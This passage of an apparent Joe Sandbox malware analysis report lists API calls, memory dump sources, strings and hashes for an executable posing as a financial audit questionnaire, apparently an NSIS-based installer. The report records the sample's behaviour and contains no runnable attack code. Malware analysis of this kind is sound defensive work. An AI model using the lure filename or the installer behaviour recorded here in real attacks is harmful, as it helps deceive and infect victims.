                                                                                                      • Part of subcall function 3356571E: HeapFree.KERNEL32(00000000,00000000,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?), ref: 33565734
                                                                                                      • Part of subcall function 3356571E: GetLastError.KERNEL32(?,?,3356924F,?,00000000,?,00000000,?,33569276,?,00000007,?,?,33567E5A,?,?), ref: 33565746
                                                                                                    • _free.LIBCMT ref: 33565381
                                                                                                    • _free.LIBCMT ref: 33565394
                                                                                                    • _free.LIBCMT ref: 335653A5
                                                                                                    • _free.LIBCMT ref: 335653B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 776569668-0
                                                                                                    • Opcode ID: cc3a905d66150477897b12b7052e5fd7b1deaa4e6d8d61f34694c879a29f68cd
                                                                                                    • Instruction ID: 4093e4519c05d9860946d534f23846f7dc6325d710d3dd3efe06c3d0bca2390d
                                                                                                    • Opcode Fuzzy Hash: cc3a905d66150477897b12b7052e5fd7b1deaa4e6d8d61f34694c879a29f68cd
                                                                                                    • Instruction Fuzzy Hash: C3F017B0C54229DBC6127F35E980C083FF1A7A8AB9389190AF851A7A50DB350483CBC2
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe,00000104), ref: 33564C1D
                                                                                                    • _free.LIBCMT ref: 33564CE8
                                                                                                    • _free.LIBCMT ref: 33564CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$FileModuleName
                                                                                                    • String ID: C:\Users\user\Desktop\Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exe
                                                                                                    • API String ID: 2506810119-1428931530
                                                                                                    • Opcode ID: 174c3ac8d00f341493106db795c5bf63af9b4c6c83f96aef8d5d1f0d26393a39
                                                                                                    • Instruction ID: c8a1495e428a3a2694b80bd410fd83c847c323bd5fe1d3b22dbaf91433218df0
                                                                                                    • Opcode Fuzzy Hash: 174c3ac8d00f341493106db795c5bf63af9b4c6c83f96aef8d5d1f0d26393a39
                                                                                                    • Instruction Fuzzy Hash: DA3162B5E00318AFEB11DF99E880D9EBFFCEF85759F545056E804A7700D6718A82CB90
                                                                                                    APIs
                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Timeout
                                                                                                    • String ID: !
                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                    • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                    • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                    • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                    • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,33566FFD,00000000,?,00000020,00000100,?,5EFC4D8B,00000000), ref: 33568731
                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?), ref: 335687BA
                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 335687CC
                                                                                                    • __freea.LIBCMT ref: 335687D5
                                                                                                      • Part of subcall function 335656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 33565702
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                    • String ID:
                                                                                                    • API String ID: 2652629310-0
                                                                                                    • Opcode ID: 95d75637bb0f6b40e6b000b131d78c2bf044a55998cb35ff5b2bb6b128f33bc1
                                                                                                    • Instruction ID: 014affc65252fd6d98aeaacadb4c1c78f79462c7edd3d8f4a3610446331c1525
                                                                                                    • Opcode Fuzzy Hash: 95d75637bb0f6b40e6b000b131d78c2bf044a55998cb35ff5b2bb6b128f33bc1
                                                                                                    • Instruction Fuzzy Hash: 2D31D076A0022AABDF248F64EC84DAF7BB5EF44319F440528FC04E7150EB36D951CB90
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00403192
                                                                                                      • Part of subcall function 0040330F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                    • WriteFile.KERNEL32(0040BE90,?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Pointer$CountTickWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 2146148272-0
                                                                                                    • Opcode ID: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                    • Instruction ID: 5e1569cfb0b545446f3df2febc41285ecf4c3109a81fe664ff5153a665b75745
                                                                                                    • Opcode Fuzzy Hash: dd796cccabb6a84ac49973fb4d75d79188a42d38f0e762117ceda5c208fcbf67
                                                                                                    • Instruction Fuzzy Hash: D9418B72504205DFDB109F29EE84AA63BADF74431671441BFE605B22E1C7B96D418BAC
                                                                                                    APIs
                                                                                                    • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                    • lstrlenW.KERNEL32(0040A598,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040A598,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 1356686001-0
                                                                                                    • Opcode ID: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                    • Instruction ID: 66b2e8a9ee20b684f946803e70458d48747d67842d9f9fe70aa08e99181ad06b
                                                                                                    • Opcode Fuzzy Hash: ba6de99ecd9c974ff92ad763852c2a36614bc53b67291303901efbf9c54001f3
                                                                                                    • Instruction Fuzzy Hash: C3118EB1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D6B85D419A29
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(?,?,00424EF0,?,00405AF6,00424EF0,00424EF0,00436800,?,76232EE0,00405834,?,00436800,76232EE0,00434000), ref: 00405A90
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405A95
                                                                                                      • Part of subcall function 00405A82: CharNextW.USER32(00000000), ref: 00405AAD
                                                                                                    • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                    • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3751793516-0
                                                                                                    • Opcode ID: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                                                                    • Instruction ID: c154c5cc2fdcc817133e571beca98f96870035068e51bbb493f84d6d7086355a
                                                                                                    • Opcode Fuzzy Hash: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                                                                    • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E
                                                                                                    APIs
                                                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                    • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                      • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1404258612-0
                                                                                                    • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                    • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                                                                    • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                                                                    • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                                                      • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                                                      • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                                                      • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                                                      • Part of subcall function 00405703: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                      • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                    • String ID:
                                                                                                    • API String ID: 3585118688-0
                                                                                                    • Opcode ID: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                                                                    • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                                                                    • Opcode Fuzzy Hash: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                                                                    • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,33561D66,00000000,00000000,?,33565C88,33561D66,00000000,00000000,00000000,?,33565E85,00000006,FlsSetValue), ref: 33565D13
                                                                                                    • GetLastError.KERNEL32(?,33565C88,33561D66,00000000,00000000,00000000,?,33565E85,00000006,FlsSetValue,3356E190,FlsSetValue,00000000,00000364,?,33565BC8), ref: 33565D1F
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,33565C88,33561D66,00000000,00000000,00000000,?,33565E85,00000006,FlsSetValue,3356E190,FlsSetValue,00000000), ref: 33565D2D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 9fa80b510fce47d3d32c36e9993f4d39f7ac083d5a8f08de6e22ab54326361bc
                                                                                                    • Instruction ID: ad4d186bc9b65b65500154e6d1e0eea3e9dd26ba024ce92afd87a6c240c37eea
                                                                                                    • Opcode Fuzzy Hash: 9fa80b510fce47d3d32c36e9993f4d39f7ac083d5a8f08de6e22ab54326361bc
                                                                                                    • Instruction Fuzzy Hash: B101D836652722ABD3115E69EC4CE4637E8AF057F5B161E20F905F7182DB20D503C7D0
                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 3356655C
                                                                                                      • Part of subcall function 335662BC: IsProcessorFeaturePresent.KERNEL32(00000017,335662AB,00000000,?,?,?,?,00000016,?,?,335662B8,00000000,00000000,00000000,00000000,00000000), ref: 335662BE
                                                                                                      • Part of subcall function 335662BC: GetCurrentProcess.KERNEL32(C0000417), ref: 335662E0
                                                                                                      • Part of subcall function 335662BC: TerminateProcess.KERNEL32(00000000), ref: 335662E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                    • String ID: *?$.
                                                                                                    • API String ID: 2667617558-3972193922
                                                                                                    • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction ID: 1cb96c85e9313fd42d0f93f431ca9e96ea552d0b4571fca960d2ac3550b1e1df
                                                                                                    • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                                    • Instruction Fuzzy Hash: 6F51C275E0120AEFDF04CFA8D880AADBBF9EF98358F649169D854E7304E6359A01CB50
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strlen
                                                                                                    • String ID: : $Se.
                                                                                                    • API String ID: 4218353326-4089948878
                                                                                                    • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction ID: 6365eca6e0d0f75b4bf958ec0f50ad8d17ed22ecfe5a470bfb4c4e9a7d0631d1
                                                                                                    • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                                                                    • Instruction Fuzzy Hash: D911E3B5D00388AEDB10CFA8E840BEEFBFCAF59209F54505AE545E7212E6705B42C765
                                                                                                    APIs
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 33562903
                                                                                                      • Part of subcall function 335635D2: RaiseException.KERNEL32(?,?,?,33562925,00000000,00000000,00000000,?,?,?,?,?,33562925,?,335721B8), ref: 33563632
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 33562920
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                    • String ID: Unknown exception
                                                                                                    • API String ID: 3476068407-410509341
                                                                                                    • Opcode ID: 4a10d17fb630e37f21144dffef985659bc7271ea6ac827231477b662d49450ba
                                                                                                    • Instruction ID: f56a54693dd8c56e046f8606516a3b8a875fc8e812bf8b6f6d81c4bc13622426
                                                                                                    • Opcode Fuzzy Hash: 4a10d17fb630e37f21144dffef985659bc7271ea6ac827231477b662d49450ba
                                                                                                    • Instruction Fuzzy Hash: 5BF02838D0030C77CB00A6A4FC0495D377C5F5069CFD0A574E965A3890EF75E956C6C0
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 004051D7
                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                                                      • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                    • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                                                                    • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                                                                    • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405C45
                                                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C60
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3426540007.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3426520711.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426559445.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426577992.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3426604932.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                    • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                    • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                                                                    • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                                                                    • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                                                                    APIs
                                                                                                    • GetOEMCP.KERNEL32(00000000,?,?,33566C7C,?), ref: 33566A1E
                                                                                                    • GetACP.KERNEL32(00000000,?,?,33566C7C,?), ref: 33566A35
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.3448925785.0000000033561000.00000040.00001000.00020000.00000000.sdmp, Offset: 33560000, based on PE: true
                                                                                                    • Associated: 00000009.00000002.3448907864.0000000033560000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000009.00000002.3448925785.0000000033576000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_33560000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: |lV3
                                                                                                    • API String ID: 0-307325368
                                                                                                    • Opcode ID: be1cb50cdad9489ac51a830ccaa87245f331ee3f5e36310d1ae2ea3ad1856092
                                                                                                    • Instruction ID: 6c598bfe6da1edd931a08668f865449dd8848df97b390327308ffda4e66f76b7
                                                                                                    • Opcode Fuzzy Hash: be1cb50cdad9489ac51a830ccaa87245f331ee3f5e36310d1ae2ea3ad1856092
                                                                                                    • Instruction Fuzzy Hash: 01F03C34901209CFE710EF68D848B6C7BB4BB40379F586744E828AA1D5EB755987CB81
                                                                                                    APIs
                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405739
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 00405716
                                                                                                    Memory Dump Source
